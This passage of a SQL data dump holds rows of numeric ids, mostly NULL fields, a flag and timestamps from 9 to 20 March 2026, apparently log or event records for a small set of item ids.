(27329, NULL, NULL, 2058, 1, '2026-03-09 04:50:29'),
(27330, NULL, NULL, 2053, 1, '2026-03-09 04:58:14'),
(27331, NULL, NULL, 2064, 1, '2026-03-09 05:11:26'),
(27332, NULL, NULL, 2061, 1, '2026-03-09 05:15:11'),
(27333, NULL, NULL, 2058, 1, '2026-03-09 05:50:08'),
(27334, NULL, NULL, 2053, 1, '2026-03-09 06:22:40'),
(27335, NULL, NULL, 2054, 1, '2026-03-09 11:24:35'),
(27336, NULL, NULL, 2059, 1, '2026-03-09 14:16:42'),
(27337, NULL, NULL, 2054, 1, '2026-03-09 14:18:49'),
(27338, NULL, NULL, 2060, 1, '2026-03-09 14:19:26'),
(27339, NULL, NULL, 2058, 1, '2026-03-09 14:20:10'),
(27340, NULL, NULL, 2054, 1, '2026-03-09 14:20:36'),
(27341, NULL, NULL, 2060, 1, '2026-03-09 14:21:44'),
(27342, NULL, NULL, 2055, 1, '2026-03-09 14:22:36'),
(27343, NULL, NULL, 2061, 1, '2026-03-09 15:07:12'),
(27344, NULL, NULL, 2060, 1, '2026-03-09 15:44:56'),
(27345, NULL, NULL, 2059, 1, '2026-03-09 15:51:06'),
(27346, NULL, NULL, 2053, 1, '2026-03-09 16:19:04'),
(27347, NULL, NULL, 2062, 1, '2026-03-09 16:33:14'),
(27348, NULL, NULL, 2062, 1, '2026-03-09 16:33:37'),
(27349, NULL, NULL, 2054, 1, '2026-03-09 19:37:53'),
(27350, NULL, NULL, 2058, 1, '2026-03-09 19:38:00'),
(27351, NULL, NULL, 2061, 1, '2026-03-09 19:43:29'),
(27352, NULL, NULL, 2064, 1, '2026-03-09 20:48:08'),
(27353, NULL, NULL, 2055, 1, '2026-03-09 21:53:01'),
(27354, NULL, NULL, 2053, 1, '2026-03-09 22:29:06'),
(27355, NULL, NULL, 2055, 1, '2026-03-09 22:42:05'),
(27356, NULL, NULL, 2058, 1, '2026-03-09 22:50:41'),
(27357, NULL, NULL, 2060, 1, '2026-03-10 00:38:28'),
(27358, NULL, NULL, 2061, 1, '2026-03-10 01:10:39'),
(27359, NULL, NULL, 2055, 1, '2026-03-10 02:37:40'),
(27360, NULL, NULL, 2060, 1, '2026-03-10 03:29:20'),
(27361, NULL, NULL, 2055, 1, '2026-03-10 06:35:57'),
(27362, NULL, NULL, 2060, 1, '2026-03-10 06:37:45'),
(27363, 8030, 128, 2064, 1, '2026-03-10 06:53:39'),
(27364, NULL, NULL, 2060, 1, '2026-03-10 07:22:50'),
(27365, NULL, NULL, 2054, 1, '2026-03-10 08:03:39'),
(27366, NULL, NULL, 2060, 1, '2026-03-10 08:35:47'),
(27367, NULL, NULL, 2053, 1, '2026-03-10 08:43:04'),
(27368, NULL, NULL, 2062, 1, '2026-03-10 08:47:21'),
(27369, NULL, NULL, 2063, 1, '2026-03-10 08:54:08'),
(27370, NULL, NULL, 2060, 1, '2026-03-10 09:00:26'),
(27371, NULL, NULL, 2059, 1, '2026-03-10 09:06:43'),
(27372, NULL, NULL, 2060, 1, '2026-03-10 13:42:06'),
(27373, NULL, NULL, 2055, 1, '2026-03-10 14:18:45'),
(27374, NULL, NULL, 2060, 1, '2026-03-10 14:19:25'),
(27375, NULL, NULL, 2062, 1, '2026-03-10 14:20:34'),
(27376, NULL, NULL, 2061, 1, '2026-03-10 14:22:07'),
(27377, NULL, NULL, 2058, 1, '2026-03-10 14:22:10'),
(27378, NULL, NULL, 2060, 1, '2026-03-10 14:22:12'),
(27379, NULL, NULL, 2058, 1, '2026-03-10 14:22:26'),
(27380, NULL, NULL, 2054, 1, '2026-03-10 14:22:31'),
(27381, NULL, NULL, 2053, 1, '2026-03-10 14:29:39'),
(27382, NULL, NULL, 2061, 1, '2026-03-10 14:35:26'),
(27383, NULL, NULL, 2054, 1, '2026-03-10 14:47:21'),
(27384, NULL, NULL, 2055, 1, '2026-03-10 14:47:22'),
(27385, NULL, NULL, 2064, 1, '2026-03-10 14:47:23'),
(27386, NULL, NULL, 2064, 1, '2026-03-10 14:47:24'),
(27387, NULL, NULL, 2064, 1, '2026-03-10 14:47:25'),
(27388, NULL, NULL, 2063, 1, '2026-03-10 14:47:26'),
(27389, NULL, NULL, 2062, 1, '2026-03-10 14:47:27'),
(27390, NULL, NULL, 2060, 1, '2026-03-10 14:47:28'),
(27391, NULL, NULL, 2059, 1, '2026-03-10 14:47:29'),
(27392, NULL, NULL, 2061, 1, '2026-03-10 14:47:30'),
(27393, NULL, NULL, 2058, 1, '2026-03-10 14:47:31'),
(27394, NULL, NULL, 2064, 1, '2026-03-10 15:49:50'),
(27395, NULL, NULL, 2062, 1, '2026-03-10 16:22:23'),
(27396, NULL, NULL, 2062, 1, '2026-03-10 16:23:17'),
(27397, NULL, NULL, 2061, 1, '2026-03-10 18:46:38'),
(27398, NULL, NULL, 2060, 1, '2026-03-10 20:52:11'),
(27399, NULL, NULL, 2061, 1, '2026-03-11 01:51:20'),
(27400, NULL, NULL, 2059, 1, '2026-03-11 02:10:56'),
(27401, NULL, NULL, 2060, 1, '2026-03-11 02:10:57'),
(27402, NULL, NULL, 2053, 1, '2026-03-11 03:15:42'),
(27403, NULL, NULL, 2061, 1, '2026-03-11 03:46:37'),
(27404, NULL, NULL, 2061, 1, '2026-03-11 03:50:17'),
(27405, NULL, NULL, 2063, 1, '2026-03-11 04:10:57'),
(27406, NULL, NULL, 2053, 1, '2026-03-11 04:35:10'),
(27407, NULL, NULL, 2060, 1, '2026-03-11 04:57:17'),
(27408, NULL, NULL, 2061, 1, '2026-03-11 05:11:06'),
(27409, NULL, NULL, 2055, 1, '2026-03-11 05:45:02'),
(27410, NULL, NULL, 2062, 1, '2026-03-11 06:49:27'),
(27411, NULL, NULL, 2061, 1, '2026-03-11 08:32:37'),
(27412, NULL, NULL, 2053, 1, '2026-03-11 08:42:24'),
(27413, NULL, NULL, 2064, 1, '2026-03-11 11:55:55'),
(27414, NULL, NULL, 2060, 1, '2026-03-11 12:34:48'),
(27415, NULL, NULL, 2060, 1, '2026-03-11 14:13:51'),
(27416, NULL, NULL, 2060, 1, '2026-03-11 14:13:54'),
(27417, NULL, NULL, 2058, 1, '2026-03-11 14:18:27'),
(27418, NULL, NULL, 2060, 1, '2026-03-11 14:19:23'),
(27419, NULL, NULL, 2055, 1, '2026-03-11 14:21:59'),
(27420, NULL, NULL, 2060, 1, '2026-03-11 14:22:33'),
(27421, NULL, NULL, 2054, 1, '2026-03-11 14:23:13'),
(27422, NULL, NULL, 2064, 1, '2026-03-11 15:08:46'),
(27423, NULL, NULL, 2062, 1, '2026-03-11 16:23:47'),
(27424, NULL, NULL, 2061, 1, '2026-03-11 17:14:59'),
(27425, NULL, NULL, 2059, 1, '2026-03-11 17:37:38'),
(27426, NULL, NULL, 2060, 1, '2026-03-11 20:27:34'),
(27427, NULL, NULL, 2060, 1, '2026-03-11 20:44:03'),
(27428, NULL, NULL, 2053, 1, '2026-03-11 23:16:25'),
(27429, NULL, NULL, 2063, 1, '2026-03-12 02:27:08'),
(27430, NULL, NULL, 2054, 1, '2026-03-12 02:27:44'),
(27431, NULL, NULL, 2062, 1, '2026-03-12 02:41:42'),
(27432, NULL, NULL, 2060, 1, '2026-03-12 03:44:36'),
(27433, NULL, NULL, 2060, 1, '2026-03-12 03:44:38'),
(27434, NULL, NULL, 2064, 1, '2026-03-12 04:36:18'),
(27435, NULL, NULL, 2064, 1, '2026-03-12 05:16:29'),
(27436, NULL, NULL, 2058, 1, '2026-03-12 05:16:35'),
(27437, NULL, NULL, 2060, 1, '2026-03-12 05:16:38'),
(27438, NULL, NULL, 2063, 1, '2026-03-12 05:16:40'),
(27439, NULL, NULL, 2063, 1, '2026-03-12 05:16:41'),
(27440, NULL, NULL, 2061, 1, '2026-03-12 05:16:43'),
(27441, NULL, NULL, 2059, 1, '2026-03-12 05:16:44'),
(27442, NULL, NULL, 2062, 1, '2026-03-12 05:16:46'),
(27443, NULL, NULL, 2062, 1, '2026-03-12 05:16:48'),
(27444, NULL, NULL, 2054, 1, '2026-03-12 05:16:50'),
(27445, NULL, NULL, 2055, 1, '2026-03-12 05:16:56'),
(27446, NULL, NULL, 2060, 1, '2026-03-12 06:49:35'),
(27447, NULL, NULL, 2062, 1, '2026-03-12 07:02:25'),
(27448, NULL, NULL, 2053, 1, '2026-03-12 07:36:22'),
(27449, NULL, NULL, 2061, 1, '2026-03-12 09:15:35'),
(27450, NULL, NULL, 2063, 1, '2026-03-12 11:19:31'),
(27451, NULL, NULL, 2061, 1, '2026-03-12 11:19:33'),
(27452, NULL, NULL, 2064, 1, '2026-03-12 11:19:33'),
(27453, NULL, NULL, 2058, 1, '2026-03-12 11:19:34'),
(27454, NULL, NULL, 2062, 1, '2026-03-12 11:19:37'),
(27455, NULL, NULL, 2054, 1, '2026-03-12 11:19:38'),
(27456, NULL, NULL, 2059, 1, '2026-03-12 11:19:38'),
(27457, NULL, NULL, 2055, 1, '2026-03-12 11:19:41'),
(27458, NULL, NULL, 2060, 1, '2026-03-12 11:19:44'),
(27459, NULL, NULL, 2060, 1, '2026-03-12 11:21:25'),
(27460, NULL, NULL, 2054, 1, '2026-03-12 11:21:35'),
(27461, NULL, NULL, 2064, 1, '2026-03-12 11:21:36'),
(27462, NULL, NULL, 2058, 1, '2026-03-12 11:21:37'),
(27463, NULL, NULL, 2059, 1, '2026-03-12 11:21:39'),
(27464, NULL, NULL, 2063, 1, '2026-03-12 11:21:40'),
(27465, NULL, NULL, 2062, 1, '2026-03-12 11:21:41'),
(27466, NULL, NULL, 2055, 1, '2026-03-12 11:21:42'),
(27467, NULL, NULL, 2060, 1, '2026-03-12 11:21:43'),
(27468, NULL, NULL, 2061, 1, '2026-03-12 11:21:45'),
(27469, NULL, NULL, 2064, 1, '2026-03-12 11:22:06'),
(27470, NULL, NULL, 2053, 1, '2026-03-12 11:22:06'),
(27471, NULL, NULL, 2055, 1, '2026-03-12 11:22:07'),
(27472, NULL, NULL, 2059, 1, '2026-03-12 11:22:10'),
(27473, NULL, NULL, 2063, 1, '2026-03-12 11:22:11'),
(27474, NULL, NULL, 2054, 1, '2026-03-12 11:22:13'),
(27475, NULL, NULL, 2061, 1, '2026-03-12 11:22:15'),
(27476, NULL, NULL, 2060, 1, '2026-03-12 11:22:16'),
(27477, NULL, NULL, 2058, 1, '2026-03-12 11:22:19'),
(27478, NULL, NULL, 2062, 1, '2026-03-12 11:22:21'),
(27479, NULL, NULL, 2053, 1, '2026-03-12 13:58:13'),
(27480, NULL, NULL, 2061, 1, '2026-03-12 14:14:16'),
(27481, NULL, NULL, 2061, 1, '2026-03-12 14:15:40'),
(27482, NULL, NULL, 2060, 1, '2026-03-12 14:20:29'),
(27483, NULL, NULL, 2060, 1, '2026-03-12 14:22:26'),
(27484, NULL, NULL, 2058, 1, '2026-03-12 14:23:04'),
(27485, NULL, NULL, 2054, 1, '2026-03-12 14:23:20'),
(27486, NULL, NULL, 2062, 1, '2026-03-12 14:23:32'),
(27487, NULL, NULL, 2055, 1, '2026-03-12 14:23:48'),
(27488, NULL, NULL, 2061, 1, '2026-03-12 15:39:21'),
(27489, NULL, NULL, 2062, 1, '2026-03-12 17:12:06'),
(27490, NULL, NULL, 2062, 1, '2026-03-12 17:12:35'),
(27491, NULL, NULL, 2060, 1, '2026-03-12 18:47:33'),
(27492, 8102, 129, 2064, 1, '2026-03-12 21:18:29'),
(27494, NULL, NULL, 2061, 1, '2026-03-12 21:30:09'),
(27495, NULL, NULL, 2053, 1, '2026-03-12 23:53:23'),
(27496, NULL, NULL, 2061, 1, '2026-03-13 00:21:45'),
(27497, NULL, NULL, 2053, 1, '2026-03-13 03:41:50'),
(27498, NULL, NULL, 2060, 1, '2026-03-13 04:23:20'),
(27499, NULL, NULL, 2060, 1, '2026-03-13 05:51:43'),
(27500, NULL, NULL, 2061, 1, '2026-03-13 06:21:59'),
(27501, NULL, NULL, 2061, 1, '2026-03-13 06:55:38'),
(27502, NULL, NULL, 2061, 1, '2026-03-13 09:18:17'),
(27503, NULL, NULL, 2055, 1, '2026-03-13 11:45:26'),
(27504, NULL, NULL, 2053, 1, '2026-03-13 12:03:23'),
(27505, NULL, NULL, 2060, 1, '2026-03-13 14:20:02'),
(27506, NULL, NULL, 2060, 1, '2026-03-13 14:20:29'),
(27507, NULL, NULL, 2059, 1, '2026-03-13 14:21:26'),
(27508, NULL, NULL, 2054, 1, '2026-03-13 14:21:33'),
(27509, NULL, NULL, 2058, 1, '2026-03-13 14:23:58'),
(27510, NULL, NULL, 2062, 1, '2026-03-13 14:24:04'),
(27511, NULL, NULL, 2055, 1, '2026-03-13 14:24:28'),
(27512, NULL, NULL, 2053, 1, '2026-03-13 15:28:38'),
(27513, NULL, NULL, 2062, 1, '2026-03-13 16:32:08'),
(27514, NULL, NULL, 2062, 1, '2026-03-13 16:32:40'),
(27515, NULL, NULL, 2061, 1, '2026-03-13 19:15:52'),
(27516, NULL, NULL, 2058, 1, '2026-03-13 20:17:19'),
(27517, NULL, NULL, 2061, 1, '2026-03-13 20:41:50'),
(27518, NULL, NULL, 2054, 1, '2026-03-13 21:40:55'),
(27519, NULL, NULL, 2060, 1, '2026-03-13 21:54:39'),
(27520, NULL, NULL, 2061, 1, '2026-03-13 22:39:23'),
(27521, NULL, NULL, 2063, 1, '2026-03-13 22:39:27'),
(27522, NULL, NULL, 2062, 1, '2026-03-13 22:39:31'),
(27523, NULL, NULL, 2064, 1, '2026-03-14 01:36:31'),
(27524, NULL, NULL, 2053, 1, '2026-03-14 01:44:36'),
(27525, NULL, NULL, 2063, 1, '2026-03-14 01:48:40'),
(27526, NULL, NULL, 2060, 1, '2026-03-14 03:50:07'),
(27527, NULL, NULL, 2053, 1, '2026-03-14 03:52:32'),
(27528, NULL, NULL, 2058, 1, '2026-03-14 06:25:33'),
(27529, NULL, NULL, 2062, 1, '2026-03-14 06:26:43'),
(27530, NULL, NULL, 2059, 1, '2026-03-14 06:38:16'),
(27531, NULL, NULL, 2060, 1, '2026-03-14 06:38:20'),
(27532, NULL, NULL, 2060, 1, '2026-03-14 08:34:18'),
(27533, NULL, NULL, 2058, 1, '2026-03-14 08:42:40'),
(27534, NULL, NULL, 2053, 1, '2026-03-14 08:42:48'),
(27535, NULL, NULL, 2061, 1, '2026-03-14 09:10:05'),
(27536, NULL, NULL, 2053, 1, '2026-03-14 10:11:26'),
(27537, NULL, NULL, 2054, 1, '2026-03-14 11:45:46'),
(27538, NULL, NULL, 2054, 1, '2026-03-14 11:53:55'),
(27539, NULL, NULL, 2059, 1, '2026-03-14 12:02:12'),
(27540, NULL, NULL, 2054, 1, '2026-03-14 12:02:15'),
(27541, NULL, NULL, 2058, 1, '2026-03-14 12:02:16'),
(27542, NULL, NULL, 2060, 1, '2026-03-14 12:02:17'),
(27543, NULL, NULL, 2055, 1, '2026-03-14 12:02:20'),
(27544, NULL, NULL, 2058, 1, '2026-03-14 14:19:47'),
(27545, NULL, NULL, 2062, 1, '2026-03-14 14:22:09'),
(27546, NULL, NULL, 2055, 1, '2026-03-14 14:22:41'),
(27547, NULL, NULL, 2054, 1, '2026-03-14 14:23:25'),
(27548, NULL, NULL, 2060, 1, '2026-03-14 14:24:16'),
(27549, NULL, NULL, 2060, 1, '2026-03-14 14:24:35'),
(27550, NULL, NULL, 2061, 1, '2026-03-14 14:27:52'),
(27551, NULL, NULL, 2053, 1, '2026-03-14 15:11:58'),
(27552, NULL, NULL, 2061, 1, '2026-03-14 16:31:44'),
(27553, NULL, NULL, 2058, 1, '2026-03-14 16:41:23'),
(27554, NULL, NULL, 2055, 1, '2026-03-14 16:52:42'),
(27555, NULL, NULL, 2059, 1, '2026-03-14 16:58:32'),
(27556, NULL, NULL, 2054, 1, '2026-03-14 17:00:46'),
(27557, NULL, NULL, 2062, 1, '2026-03-14 17:02:39'),
(27558, NULL, NULL, 2062, 1, '2026-03-14 17:02:58'),
(27559, NULL, NULL, 2060, 1, '2026-03-14 18:49:31'),
(27560, NULL, NULL, 2061, 1, '2026-03-14 19:27:39'),
(27561, NULL, NULL, 2055, 1, '2026-03-14 19:28:19'),
(27562, NULL, NULL, 2054, 1, '2026-03-14 19:30:34'),
(27563, NULL, NULL, 2058, 1, '2026-03-14 19:30:55'),
(27564, NULL, NULL, 2063, 1, '2026-03-14 19:31:15'),
(27565, NULL, NULL, 2062, 1, '2026-03-14 19:33:54'),
(27566, NULL, NULL, 2064, 1, '2026-03-14 19:35:06'),
(27567, NULL, NULL, 2060, 1, '2026-03-14 19:44:35'),
(27568, NULL, NULL, 2059, 1, '2026-03-14 19:46:58'),
(27569, NULL, NULL, 2053, 1, '2026-03-14 19:54:23'),
(27570, NULL, NULL, 2060, 1, '2026-03-14 20:00:03'),
(27571, NULL, NULL, 2061, 1, '2026-03-14 20:43:32'),
(27572, NULL, NULL, 2053, 1, '2026-03-14 22:20:14'),
(27573, NULL, NULL, 2064, 1, '2026-03-14 22:40:33'),
(27574, NULL, NULL, 2059, 1, '2026-03-14 23:02:05'),
(27575, NULL, NULL, 2062, 1, '2026-03-14 23:30:32'),
(27576, NULL, NULL, 2060, 1, '2026-03-14 23:58:08'),
(27577, NULL, NULL, 2053, 1, '2026-03-15 03:41:30'),
(27578, NULL, NULL, 2062, 1, '2026-03-15 04:34:25'),
(27579, NULL, NULL, 2053, 1, '2026-03-15 05:04:30'),
(27580, NULL, NULL, 2061, 1, '2026-03-15 05:07:23'),
(27581, NULL, NULL, 2059, 1, '2026-03-15 05:58:40'),
(27582, NULL, NULL, 2060, 1, '2026-03-15 05:59:17'),
(27583, NULL, NULL, 2063, 1, '2026-03-15 07:59:37'),
(27584, NULL, NULL, 2058, 1, '2026-03-15 08:35:49'),
(27585, NULL, NULL, 2061, 1, '2026-03-15 09:10:51'),
(27586, NULL, NULL, 2060, 1, '2026-03-15 10:39:46'),
(27587, NULL, NULL, 2061, 1, '2026-03-15 10:56:31'),
(27588, NULL, NULL, 2061, 1, '2026-03-15 10:56:32'),
(27589, NULL, NULL, 2053, 1, '2026-03-15 12:09:45'),
(27590, NULL, NULL, 2063, 1, '2026-03-15 12:22:18'),
(27591, NULL, NULL, 2062, 1, '2026-03-15 12:50:07'),
(27592, NULL, NULL, 2063, 1, '2026-03-15 12:50:14'),
(27593, NULL, NULL, 2059, 1, '2026-03-15 13:47:10'),
(27594, NULL, NULL, 2062, 1, '2026-03-15 14:19:07'),
(27595, NULL, NULL, 2060, 1, '2026-03-15 14:20:39'),
(27596, NULL, NULL, 2058, 1, '2026-03-15 14:22:05'),
(27597, NULL, NULL, 2058, 1, '2026-03-15 14:22:24'),
(27598, NULL, NULL, 2060, 1, '2026-03-15 14:22:36'),
(27599, NULL, NULL, 2054, 1, '2026-03-15 14:22:38'),
(27600, NULL, NULL, 2055, 1, '2026-03-15 14:23:58'),
(27601, NULL, NULL, 2061, 1, '2026-03-15 16:17:31'),
(27602, NULL, NULL, 2060, 1, '2026-03-15 16:19:16'),
(27603, NULL, NULL, 2062, 1, '2026-03-15 16:32:32'),
(27604, NULL, NULL, 2063, 1, '2026-03-15 16:41:44'),
(27605, NULL, NULL, 2061, 1, '2026-03-15 18:54:56'),
(27606, NULL, NULL, 2062, 1, '2026-03-15 20:32:22'),
(27607, NULL, NULL, 2060, 1, '2026-03-15 23:25:06'),
(27608, NULL, NULL, 2053, 1, '2026-03-15 23:52:38'),
(27609, NULL, NULL, 2061, 1, '2026-03-15 23:59:46'),
(27610, NULL, NULL, 2058, 1, '2026-03-16 00:10:06'),
(27611, NULL, NULL, 2055, 1, '2026-03-16 02:37:33'),
(27612, NULL, NULL, 2060, 1, '2026-03-16 02:50:49'),
(27613, NULL, NULL, 2060, 1, '2026-03-16 02:50:51'),
(27614, NULL, NULL, 2061, 1, '2026-03-16 03:19:16'),
(27615, NULL, NULL, 2053, 1, '2026-03-16 04:18:22'),
(27616, NULL, NULL, 2060, 1, '2026-03-16 05:04:12'),
(27617, NULL, NULL, 2059, 1, '2026-03-16 05:29:02'),
(27618, NULL, NULL, 2060, 1, '2026-03-16 08:36:37'),
(27619, NULL, NULL, 2058, 1, '2026-03-16 08:36:59'),
(27620, NULL, NULL, 2062, 1, '2026-03-16 08:54:18'),
(27621, NULL, NULL, 2063, 1, '2026-03-16 09:11:53'),
(27622, NULL, NULL, 2059, 1, '2026-03-16 09:28:39'),
(27623, NULL, NULL, 2060, 1, '2026-03-16 09:37:22'),
(27624, NULL, NULL, 2054, 1, '2026-03-16 10:28:48'),
(27625, NULL, NULL, 2060, 1, '2026-03-16 11:06:48'),
(27626, NULL, NULL, 2058, 1, '2026-03-16 14:18:09'),
(27627, NULL, NULL, 2054, 1, '2026-03-16 14:18:18'),
(27628, NULL, NULL, 2055, 1, '2026-03-16 14:18:24'),
(27629, NULL, NULL, 2062, 1, '2026-03-16 14:19:07'),
(27630, NULL, NULL, 2054, 1, '2026-03-16 14:19:53'),
(27631, NULL, NULL, 2060, 1, '2026-03-16 14:21:37'),
(27632, NULL, NULL, 2060, 1, '2026-03-16 14:21:40'),
(27633, NULL, NULL, 2060, 1, '2026-03-16 14:22:00'),
(27634, NULL, NULL, 2061, 1, '2026-03-16 14:49:36'),
(27635, NULL, NULL, 2053, 1, '2026-03-16 15:30:57'),
(27636, NULL, NULL, 2060, 1, '2026-03-16 15:31:50'),
(27637, NULL, NULL, 2060, 1, '2026-03-16 16:37:38'),
(27638, NULL, NULL, 2060, 1, '2026-03-16 16:37:43'),
(27639, NULL, NULL, 2060, 1, '2026-03-16 17:05:20'),
(27640, NULL, NULL, 2062, 1, '2026-03-16 17:06:47'),
(27641, NULL, NULL, 2062, 1, '2026-03-16 17:07:05'),
(27642, NULL, NULL, 2060, 1, '2026-03-16 17:44:52'),
(27643, NULL, NULL, 2053, 1, '2026-03-16 18:05:12'),
(27644, NULL, NULL, 2060, 1, '2026-03-16 19:21:06'),
(27645, NULL, NULL, 2058, 1, '2026-03-16 19:30:22'),
(27646, NULL, NULL, 2054, 1, '2026-03-16 19:47:30'),
(27647, NULL, NULL, 2058, 1, '2026-03-16 19:47:32'),
(27648, NULL, NULL, 2064, 1, '2026-03-16 20:34:48'),
(27649, NULL, NULL, 2055, 1, '2026-03-16 21:01:44'),
(27650, NULL, NULL, 2058, 1, '2026-03-16 21:32:40'),
(27651, NULL, NULL, 2063, 1, '2026-03-16 21:37:00'),
(27652, NULL, NULL, 2061, 1, '2026-03-16 22:55:47'),
(27653, NULL, NULL, 2061, 1, '2026-03-16 23:38:15'),
(27654, NULL, NULL, 2064, 1, '2026-03-17 01:29:51'),
(27655, NULL, NULL, 2053, 1, '2026-03-17 01:36:15'),
(27656, NULL, NULL, 2064, 1, '2026-03-17 03:04:25'),
(27657, NULL, NULL, 2058, 1, '2026-03-17 03:47:14'),
(27658, NULL, NULL, 2061, 1, '2026-03-17 03:54:38'),
(27659, NULL, NULL, 2060, 1, '2026-03-17 07:16:39'),
(27660, NULL, NULL, 2061, 1, '2026-03-17 07:19:52'),
(27661, NULL, NULL, 2061, 1, '2026-03-17 09:04:54'),
(27662, NULL, NULL, 2053, 1, '2026-03-17 09:35:12'),
(27663, NULL, NULL, 2055, 1, '2026-03-17 12:49:06'),
(27664, NULL, NULL, 2060, 1, '2026-03-17 13:44:41'),
(27665, NULL, NULL, 2060, 1, '2026-03-17 14:19:49'),
(27666, NULL, NULL, 2055, 1, '2026-03-17 14:20:43'),
(27667, NULL, NULL, 2054, 1, '2026-03-17 14:20:45'),
(27668, NULL, NULL, 2060, 1, '2026-03-17 14:21:32'),
(27669, NULL, NULL, 2060, 1, '2026-03-17 14:22:11'),
(27670, NULL, NULL, 2062, 1, '2026-03-17 14:22:32'),
(27671, NULL, NULL, 2058, 1, '2026-03-17 14:24:19'),
(27672, NULL, NULL, 2053, 1, '2026-03-17 15:51:09'),
(27673, NULL, NULL, 2060, 1, '2026-03-17 16:43:24'),
(27674, NULL, NULL, 2062, 1, '2026-03-17 17:05:26'),
(27675, NULL, NULL, 2062, 1, '2026-03-17 17:06:00'),
(27676, NULL, NULL, 2061, 1, '2026-03-17 18:31:10'),
(27677, NULL, NULL, 2060, 1, '2026-03-17 19:00:35'),
(27678, NULL, NULL, 2053, 1, '2026-03-17 22:50:38'),
(27679, NULL, NULL, 2060, 1, '2026-03-17 22:55:55'),
(27680, NULL, NULL, 2061, 1, '2026-03-18 00:37:06'),
(27681, NULL, NULL, 2053, 1, '2026-03-18 01:18:24'),
(27682, NULL, NULL, 2061, 1, '2026-03-18 05:24:46'),
(27683, NULL, NULL, 2061, 1, '2026-03-18 06:55:24'),
(27684, NULL, NULL, 2053, 1, '2026-03-18 07:36:41'),
(27685, NULL, NULL, 2060, 1, '2026-03-18 08:40:44'),
(27686, NULL, NULL, 2060, 1, '2026-03-18 09:33:31'),
(27687, NULL, NULL, 2053, 1, '2026-03-18 10:31:52'),
(27688, NULL, NULL, 2062, 1, '2026-03-18 14:19:53'),
(27689, NULL, NULL, 2054, 1, '2026-03-18 14:19:58'),
(27690, NULL, NULL, 2060, 1, '2026-03-18 14:21:08'),
(27691, NULL, NULL, 2055, 1, '2026-03-18 14:22:20'),
(27692, NULL, NULL, 2060, 1, '2026-03-18 14:23:55'),
(27693, NULL, NULL, 2058, 1, '2026-03-18 14:24:30'),
(27694, NULL, NULL, 2053, 1, '2026-03-18 15:56:10'),
(27695, NULL, NULL, 2061, 1, '2026-03-18 16:35:52'),
(27696, NULL, NULL, 2060, 1, '2026-03-18 17:43:49'),
(27697, NULL, NULL, 2059, 1, '2026-03-18 17:44:42'),
(27698, NULL, NULL, 2062, 1, '2026-03-18 17:53:07'),
(27699, NULL, NULL, 2062, 1, '2026-03-18 17:53:34'),
(27700, NULL, NULL, 2060, 1, '2026-03-18 18:32:40'),
(27701, NULL, NULL, 2060, 1, '2026-03-18 20:07:40'),
(27702, NULL, NULL, 2061, 1, '2026-03-18 21:56:46'),
(27703, NULL, NULL, 2053, 1, '2026-03-18 22:01:14'),
(27704, NULL, NULL, 2061, 1, '2026-03-19 02:33:30'),
(27705, NULL, NULL, 2053, 1, '2026-03-19 02:38:38'),
(27706, NULL, NULL, 2060, 1, '2026-03-19 02:46:34'),
(27707, NULL, NULL, 2064, 1, '2026-03-19 04:46:49'),
(27708, NULL, NULL, 2060, 1, '2026-03-19 05:47:54'),
(27709, NULL, NULL, 2053, 1, '2026-03-19 06:40:38'),
(27710, NULL, NULL, 2061, 1, '2026-03-19 07:52:13'),
(27711, NULL, NULL, 2053, 1, '2026-03-19 10:44:51'),
(27712, NULL, NULL, 2060, 1, '2026-03-19 11:49:23'),
(27713, NULL, NULL, 2061, 1, '2026-03-19 11:52:49'),
(27714, NULL, NULL, 2060, 1, '2026-03-19 14:18:58'),
(27715, NULL, NULL, 2062, 1, '2026-03-19 14:20:22'),
(27716, NULL, NULL, 2058, 1, '2026-03-19 14:21:19'),
(27717, NULL, NULL, 2064, 1, '2026-03-19 14:22:14'),
(27718, NULL, NULL, 2064, 1, '2026-03-19 14:22:34'),
(27719, NULL, NULL, 2054, 1, '2026-03-19 14:23:42'),
(27720, NULL, NULL, 2060, 1, '2026-03-19 14:23:42'),
(27721, NULL, NULL, 2055, 1, '2026-03-19 14:23:45'),
(27722, NULL, NULL, 2062, 1, '2026-03-19 17:10:18'),
(27723, NULL, NULL, 2062, 1, '2026-03-19 17:10:44'),
(27724, NULL, NULL, 2053, 1, '2026-03-19 17:52:56'),
(27725, NULL, NULL, 2058, 1, '2026-03-19 21:13:09'),
(27726, NULL, NULL, 2060, 1, '2026-03-19 21:26:32'),
(27727, NULL, NULL, 2061, 1, '2026-03-19 22:24:06'),
(27728, NULL, NULL, 2061, 1, '2026-03-19 22:32:36'),
(27729, NULL, NULL, 2064, 1, '2026-03-19 22:32:36'),
(27730, NULL, NULL, 2064, 1, '2026-03-19 22:32:40'),
(27731, NULL, NULL, 2061, 1, '2026-03-19 22:32:40'),
(27732, NULL, NULL, 2058, 1, '2026-03-19 22:32:40'),
(27733, NULL, NULL, 2063, 1, '2026-03-19 22:32:40'),
(27734, NULL, NULL, 2062, 1, '2026-03-19 22:32:40'),
(27735, NULL, NULL, 2059, 1, '2026-03-19 22:32:40'),
(27736, NULL, NULL, 2054, 1, '2026-03-19 22:33:10'),
(27737, NULL, NULL, 2060, 1, '2026-03-19 22:33:11'),
(27738, NULL, NULL, 2064, 1, '2026-03-19 22:33:19'),
(27739, NULL, NULL, 2053, 1, '2026-03-19 22:33:20'),
(27740, NULL, NULL, 2054, 1, '2026-03-19 22:33:21'),
(27741, NULL, NULL, 2055, 1, '2026-03-19 22:33:22'),
(27742, NULL, NULL, 2060, 1, '2026-03-19 22:33:24'),
(27743, NULL, NULL, 2064, 1, '2026-03-19 22:33:32'),
(27744, NULL, NULL, 2053, 1, '2026-03-19 23:29:23'),
(27745, NULL, NULL, 2060, 1, '2026-03-20 01:49:54'),
(27746, NULL, NULL, 2053, 1, '2026-03-20 02:04:48'),
(27747, NULL, NULL, 2061, 1, '2026-03-20 02:11:55'),
(27748, NULL, NULL, 2053, 1, '2026-03-20 03:48:41'),
(27749, NULL, NULL, 2053, 1, '2026-03-20 05:45:39'),
(27750, NULL, NULL, 2061, 1, '2026-03-20 06:25:06'),
(27751, NULL, NULL, 2060, 1, '2026-03-20 06:26:29'),
(27752, NULL, NULL, 2060, 1, '2026-03-20 06:26:32'),
(27753, NULL, NULL, 2061, 1, '2026-03-20 08:14:43'),
(27754, NULL, NULL, 2053, 1, '2026-03-20 08:27:02'),
(27755, NULL, NULL, 2060, 1, '2026-03-20 09:16:11'),
(27756, NULL, NULL, 2060, 1, '2026-03-20 09:50:40'),
(27757, NULL, NULL, 2055, 1, '2026-03-20 11:42:00'),
